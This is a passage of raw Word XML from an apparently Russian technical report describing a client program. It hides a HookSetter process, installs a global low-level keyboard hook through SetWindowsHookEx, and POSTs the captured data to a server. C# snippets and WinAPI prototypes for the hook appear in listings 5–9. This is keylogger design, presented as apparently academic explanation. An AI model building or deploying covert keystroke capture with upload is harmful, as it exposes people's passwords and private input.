          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sender</w:t>
      </w:r>
      <w:r w:rsidR="00752B8C" w:rsidRPr="0056715A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0056715A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">проверяет наличие всех необходимых директорий, при необходимости </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>создает их.</w:t>
      </w:r>
      <w:r w:rsidR="00305665">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00305665">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sender</w:t>
      </w:r>
      <w:r w:rsidR="00305665" w:rsidRPr="00305665">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00305665">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">запускает установщик хука – </w:t>
      </w:r>
      <w:r w:rsidR="00305665">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setter</w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – листинг 5</w:t>
      </w:r>
      <w:r w:rsidR="00305665">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00305665" w:rsidRPr="00305665">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305665" w:rsidRPr="000770CC" w:rsidRDefault="00305665" w:rsidP="00305665">
      <w:pPr>
        <w:pStyle w:val="a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Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="000770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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305665" w:rsidRDefault="00305665" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00305665">
        <w:t>Process processHook = new Process()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305665" w:rsidRDefault="00305665" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>processHook.StartInfo.UseShellExecute = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305665" w:rsidRDefault="00305665" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>processHook.StartInfo.FileName = Path.Combine(basePath, @"Logger\App\HookSetter.exe");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305665" w:rsidRDefault="00305665" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>processHook.StartInfo.CreateNoWindow = true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4402" w:rsidRPr="00305665" w:rsidRDefault="00305665" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305665">
        <w:t>processHook.Start();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF2627" w:rsidRPr="00305665" w:rsidRDefault="00305665" w:rsidP="00966446">
      <w:pPr>
        <w:pStyle w:val="a7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запуска </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-а</w:t>
      </w:r>
      <w:r w:rsidR="004E168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Sender</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> выдерживает таймаут, останавливает процесс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-а и производит передачу данных на сервер. </w:t>
      </w:r>
      <w:r>
        <w:t>Также</w:t>
      </w:r>
      <w:r w:rsidRPr="00F97199">
        <w:t xml:space="preserve"> клиентское приложение отправляет запрос на сервер с помощью метода </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00F97199">
        <w:t xml:space="preserve"> протокола </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97199">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F97199">
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">перезапуска </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97199">
        <w:t xml:space="preserve">выбранного пользователем </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">процесса </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97199">
        <w:t>на сервере</w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – листинг 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305665" w:rsidRPr="00966446" w:rsidRDefault="00305665" w:rsidP="00305665">
      <w:pPr>
        <w:pStyle w:val="a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Листинг 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF2627" w:rsidRPr="00305665" w:rsidRDefault="00305665" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305665">
        <w:t>processHook.Kill();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305665" w:rsidRPr="00305665" w:rsidRDefault="00305665" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305665">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>var response = client.PostAsync("api/values/Post", content);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00910C11" w:rsidRDefault="00486AA8" w:rsidP="00896B7B">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc531587655"/>
      <w:r>
        <w:t xml:space="preserve">После запуска </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sender</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> устанавливает хук.</w:t>
      </w:r>
      <w:r w:rsidR="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00896B7B" w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для установки хука можно использовать следующую WinAPI функцию </w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– л</w:t>
      </w:r>
      <w:r w:rsidR="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>истинг</w:t>
      </w:r>
      <w:r w:rsidR="00910C11" w:rsidRPr="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r w:rsidR="00896B7B" w:rsidRPr="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00896B7B">
      <w:pPr>
        <w:pStyle w:val="a7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Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HHOOK WINAPI SetWindowsHookEx(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> _In_ int idHook,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> _In_ HOOKPROC lpfn,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> _In_ HINSTANCE hMod,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> _In_ DWORD dwThreadId</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00896B7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>где</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">idHook – тип процедуры для ловушки (из </w:t>
      </w:r>
      <w:r w:rsidR="004E1687" w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>описанных</w:t>
      </w:r>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> выше)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lpfn — указатель на функцию, обрабатывающую перехваченные сообщения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hMod — дескриптор экземпляра приложения, содержащий обрабатывающую функцию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dwThreadId — идентификатор потока, сообщения которого мы хотим перехватывать. Нужно установить данный параметр в 0, чтобы перехватывать сообщения всех потоков</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00896B7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Возвращаемое значение – дескриптор установленной ловушки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00451CAA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Прототип функции, обрабатывающей значение ловушки выглядит</w:t>
      </w:r>
      <w:r w:rsidR="00451CAA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>следящим образом – л</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>истинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00896B7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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00896B7B">
      <w:pPr>
        <w:pStyle w:val="a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Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00896B7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8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>LRESULT CALLBACK LowLevelKeyboardProc(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> _In_ int nCode,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> _In_ WPARAM wParam,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> _In_ LPARAM lParam</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00896B7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>где</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nCode должен быть равен HC_ACTION, иначе сообщение предоставляется другому процессу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wParam — это одно из следующих значений WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, или WM_SYSKEYUP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">lParam — указатель на структуру KBDLLHOOKSTRUCT </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896B7B" w:rsidRPr="00896B7B" w:rsidRDefault="00896B7B" w:rsidP="00896B7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее функция должна вернуть значение функции CallNextHookEx, в</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>противном же случае, следующая обрабатывающий событие функция, может</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>получить неверные параметры сообщения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRPr="00896B7B" w:rsidRDefault="00451CAA" w:rsidP="00451CAA">
      <w:pPr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896B7B" w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>труктура KBDLLHOOKSTRUCT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– л</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>истинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00896B7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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00896B7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRPr="00896B7B" w:rsidRDefault="00451CAA" w:rsidP="00451CAA">
      <w:pPr>
        <w:pStyle w:val="a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Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00896B7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9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>typedef struct tagKBDLLHOOKSTRUCT {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> DWORD vkCode;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> DWORD scanCode;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> DWORD flags;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451CAA" w:rsidRDefault="00451CAA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
